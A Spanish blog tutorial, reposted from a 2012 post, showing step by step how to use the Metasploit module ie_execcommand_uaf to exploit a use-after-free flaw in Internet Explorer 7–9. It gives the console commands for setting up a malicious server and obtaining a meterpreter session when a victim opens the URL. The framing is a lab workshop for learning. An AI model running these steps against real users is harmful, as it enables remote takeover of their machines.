Explotando IE 8

Este 0-Day lleva bastante tiempo publicado y es una falla que afecta a las versiones de Internet Explorer (7, 8 y 9 ) en sus distintas versiones de Windows. De tal manera realizaremos un taller tomando esta vulnerabilidad de IE y la exploraremos con Metasploit, así entenderemos como funciona un exploit y los peligros que una falla de seguridad conlleva.

Antes de comenzar aclarare que la entrada original fue publicada en el blog de 0verl0ad.com en 2012 y me he tomado la libertad de publicarla sin tomar crédito de aquello, solo preparo los cimientos para la construcción de un taller de hacking,  virtualizando algunas maquinas y poder estudiar el asunto mencionado.

0-day en IE y Metasploit, al ataque!!


Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo :D
Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:
msfupdate

una vez este al día lo iniciamos con:
msfconsole

y veremos su bonita presentación (son geniales los banners de metasploit xD):
 

Lo siguiente es seleccionar el exploit a utilizar, para ello:
use exploit/windows/browser/ie_execcommand_uaf


Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:
info


En este caso vemos que el exploit funciona sobre:

  • IE7 en Windows XP SP3

  • IE8 en Windows XP SP3

  • IE7 en Windows Vista

  • IE8 en Windows Vista

  • IE8 en Windows 7

  • IE9 en Windows 7


 Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.

El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:
set SRVHOST <IP>

en el ejemplo:
set SRVHOST 192.168.0.111

y por último lanzar el exploit:
exploit


Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit :D


 

Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:
sessions -l


Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.

Si queréis más información, aquí tenéis una entrada del blog de rapid7 => https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit


Nos leemos en breve ;)

1 comentario:

  1. Reblogueó esto en El Blog del Chotey comentado:
    0-day en IE y Metasploit, al ataque!!

    ResponderEliminar